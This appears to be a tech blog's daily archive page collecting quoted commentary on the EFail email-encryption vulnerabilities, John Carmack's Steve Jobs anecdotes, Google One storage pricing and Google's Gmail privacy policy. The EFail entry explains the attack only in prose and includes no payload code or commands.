Archive for May 14, 2018

Monday, May 14, 2018

EFail Vulnerabilities in OpenPGP and S/MIME

Efail (PDF, Hacker News, MacRumors, ArsTechnica):

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

The attacker changes an encrypted email in a particular way and sends this changed encrypted email to the victim. The victim’s email client decrypts the email and loads any external content, thus exfiltrating the plaintext to the attacker.


The victim’s client decrypts the encrypted second body part and stitches the three body parts together in one HTML email as shown below. Note that the src attribute of the image tag in line 1 is closed in line 4, so the URL spans over all four lines.

The email client then URL encodes all non-printable characters (e.g., %20 is a whitespace) and requests an image from that URL. As the path of the URL contains the plaintext of the encrypted email, the victim’s email client sends the plaintext to the attacker.


Second, we describe the novel CBC/CFB gadget attacks which abuse vulnerabilities in the specification of OpenPGP and S/MIME to exfiltrate the plaintext.

Matthew Green:

PGP has supported proper optional message authentication (which stops this attack) since 2001, but it can’t be made mandatory because “some implementations haven’t kept up.”


So in summary, PGP clients are vulnerable because 17 years after a vulnerability was known, the mitigation was not made a default in GnuPG and defense was instead “left to PGP clients”, which also make a convenient scapegoat when it goes pear-shaped.


Moving on from the question of who is to blame, there are two neat findings in this work. The first is that most mail clients are (were) way too willing to reach out to remote servers, even when set up not to. This is: yikes.

Update (2018-05-14): See also: Bruce Schneier.

Update (2018-05-15): Howard Oakley:

It appears that macOS High Sierra 10.13.4 does address direct exfiltration of S/MIME email, with the following fix now reported in its security release notes[…]

Update (2018-05-18): See also: Matthew Green.

John Carmack’s Steve Jobs Stories

John Carmack (Hacker News, Reddit):

I was brought in to talk about the needs of games in general, but I made it my mission to get Apple to adopt OpenGL as their 3D graphics API.


Steve first talked about application development for iPhone at the same keynote I was demonstrating the new ID Tech 5 rendering engine on Mac, so I was in the front row. When he started going on about “Web Apps”, I was (reasonably quietly) going “Booo!!!”.

After the public cleared out and the rest of us were gathered in front of the stage, I started urgently going on about how web apps are terrible, and wouldn’t show the true potential of the device. We could do so much more with real native access!

Steve responded with a line he had used before: “Bad apps could bring down cell phone towers.” I hated that line. He could have just said “We aren’t ready”, and that would have been fine.


The Steve Jobs “hero / shithead” rollercoaster was real, and after riding high for a long time, I was now on the down side. Someone told me that Steve explicitly instructed them to not give me access to the early iPhone SDK when it finally was ready.

Previously: A Very Sweet Solution.

Update (2018-05-18): Jim Black (via John Carmack, Hacker News):

And what happened next was one of the most impressive things I’ve ever witnessed about Steve or any Silicon Valley exec. Early on in the discussion, the Apple engineer realized that “graphics engineer” in the room was John Carmack. And he realized that he was going to need to defend his technical decision, on the merits, in front of Steve. After extended back and forth, the Apple engineer said, “John, what you’re arguing for is the ideal …”

He never made it to the next word because Steve suddenly stood bolt upright, slamming both palms onto the desk and shouting, “NO!!!!”

“NO!!! What John is saying is NOT the ideal. What John is saying is what we have to do!!! Why are we doing this? Why are we going to all this trouble to build this ship when you’re putting a TORPEDO IN ITS HULL?!!!!”


As a comical aftermath to the story, John next told Steve point blank that the iMac mouse “sucked.” Steve sighed and explained that “iMac was for first-time computer buyers and every study showed that if you put more than one button on the mouse, the users ended up staring at the mouse.” John sat expressionless for 2 seconds, then moved on to another topic without comment.

Google Is Rebranding Storage Plans As “Google One”

Frederic Lardinois (Hacker News):

Google is revamping its consumer storage plans today by adding a new $2.99/month tier for 200 GB of storage and dropping the price of its 2 TB plan from $19.99/month to $9.99/month (and dropping the $9.99/month 1 TB plan). It’s also rebranding these storage plans (but not Google Drive itself) as “Google One.”

Going forward, you’ll also be able to share your storage quota with up to five family members.


That access to live experts — not some barely functional AI chatbot — comes with every Google One plan, including the $1.99/month 100 GB plan.


It’s worth stressing that the existing free quota of 15 GB will remain.


I think this article is missing the bigger picture—this isn’t about storage. This is Google trying to copy the success of Amazon Prime.

They’re going to try to unify lots of different benefits under a single, high-value subscription. The storage plans and priority support are just the first benefit they’ve tied to the subscription.

Previously: The Missing iCloud Storage Bump.

Update (2018-05-15): John Gruber:

So Google is now ahead on the free and $1/month tiers — but not by much — and is only matching Apple at the other tiers. I would think Google would want to kick Apple’s ass here.

Google’s Privacy Policy

Paris Martineau:

Though Google announced that it would stop using consumer Gmail content for ad personalization last July, the language permitting it to do so is still included in its current privacy policy, and it without a doubt still scans users emails for other purposes. Aaron Stein, a Google spokesperson, told NBC that Google also automatically extracts keyword data from users’ Gmail accounts, which is then fed into machine learning programs and other products within the Google family. Stein told NBC that Google also “may analyze [email] content to customize search results, better detect spam and malware,” a practice the company first announced back in 2012.

Via Nick Heer:

It’s bothersome that Google was scooping up users’ emails for ad targeting purposes in the first place, then said that they would stop doing it — after way too long — and has now given itself permission to keep doing so if they want to.

I don’t really understand the issue here. The headline seems misleading:

Remember when Google said it would stop reading your email?

Google only said that it would stop using your e-mail for advertising purposes, and no one is alleging that it didn’t follow through. The privacy policy that’s mentioned says:

When you share information with us, for example by creating a Google Account, we can make those services even better – to show you more relevant search results and ads, to help you connect with people or to make sharing with others quicker and easier.

But this seems to apply to all of Google’s services, so of course it has to say that. Maybe there should be a separate privacy policy for Gmail?

Previously: Google Will Stop Reading Your E-mails for Gmail Ads.